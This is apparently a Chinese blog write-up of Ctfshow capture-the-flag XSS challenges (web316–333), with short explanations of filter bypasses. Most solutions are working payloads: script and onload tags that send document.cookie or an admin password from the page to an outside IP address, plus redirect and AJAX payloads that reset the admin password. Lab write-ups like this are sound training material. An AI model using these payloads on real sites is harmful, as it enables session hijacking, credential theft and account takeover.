【Web】Ctfshow XSS刷题记录

目录

反射型XSS

①web316

②web317-319

③web320-322

④web323-326

存储型XSS

①web327

②web328

③web329

④web330

⑤web331

⑥web332-333


反射型XSS

①web316

直接输入<script>alert(1)</script>,能弹窗。xss题目一般会有个bot,可以触发你的xss代码。如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。

payload:

复制代码
<script>window.open("http://124.222.136.33:1337/"+document.cookie)</script>

②web317-319

script被过滤了,无法弹出1,此时换标签进行尝试

payload:

复制代码
<body onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

③web320-322

过滤了空格,用/**/来替代

payload:

复制代码
<body/**/onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

④web323-326

过滤了iframe

payload:

复制代码
<body/**/onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

存储型XSS

①web327

payload:

复制代码
<body/**/onload="window.open('http://124.222.136.33:1337/'+document.cookie)"></body>

②web328

payload:

复制代码
<script>window.open("http://124.222.136.33:1337/"+document.cookie)</script>

管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码,从而获得admin的payload

拿到admin的cookie

改一下cookie看到flag

③web329

这里的是管理员在点击过js后立马登出,它的cookie一直是无效的,我们这里获取的话可以去获取它的用户名和密码

密码在layui-table-cell laytable-cell-1-0-1类中,可以用getElementsByClassName来获取

payload:

复制代码
<script>window.open('http://124.222.136.33:1337/'+document.getElementsByClassName('layui-table-cell laytable-cell-1-0-1')[1].innerHTML)</script>

④web330

发现多了一个修改密码的界面

先自己随便注册登陆再修改密码抓包看看

确定payload:

复制代码
<script>window.location.href='http://127.0.0.1/api/change.php?p=admin';</script>

直接用admin admin登录,下面就可以为所欲为了

⑤web331

修改密码抓个包发现是以post方法提交

这里用Ajax提交post请求

payload:

复制代码
<script>$.ajax({url:'api/change.php',type:'post',data:{p:'admin'}});</script>

用admin admin登录即可

⑥web332-333

这俩题是支付逻辑漏洞,这里不多赘述

相关推荐
ZC跨境爬虫25 分钟前
跟着 MDN 学 HTML day_29:(动态构建与更新 DOM 树)
前端·javascript·ui·html·html5·媒体
编程技术手记30 分钟前
html table布局平衡
前端·html
huoyueyi40 分钟前
3D数字孪生项目 LCP 优化指南
前端·3d·几何学
菜鸟小芯1 小时前
【腾讯位置服务开发者征文大赛】校园美食雷达 —— 基于 CodeBuddy + 腾讯 LBS 开发实战
前端·美食
曲幽1 小时前
初探:用 FastAPI 搭建你的第一个 AI Agent 接口
python·ai·llm·agent·fastapi·web·chat·httpx·ollama
搜狐技术产品小编20231 小时前
深度解析与业务实战:将 screenshot-to-code 改造为支持 React + Ant Design 的前端利器
前端·javascript·react.js·前端框架·ecmascript
Rik1 小时前
Cursor Rules 深度玩法:从全局配置到项目级规则,让 AI 真正理解你的项目
前端·后端
weixin_471383031 小时前
set和map结构,减少O(n)复杂度
前端·javascript
hunteritself1 小时前
GPT Image2 + Seedance 2.0:3 小时从剧本到 AI 互动影游,深度实测复盘
前端·数据库·人工智能·深度学习·transformer
独秀不如众秀2 小时前
前端页面引擎协议:由浅入深——从 30 行到 vform3 的演化之路
前端